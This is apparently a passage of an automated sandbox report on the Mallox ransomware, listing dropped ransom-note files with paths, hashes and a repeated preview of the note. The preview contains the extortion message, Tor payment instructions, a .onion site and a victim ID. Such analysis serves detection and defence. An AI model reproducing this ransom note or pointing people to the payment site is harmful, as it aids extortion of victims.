                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
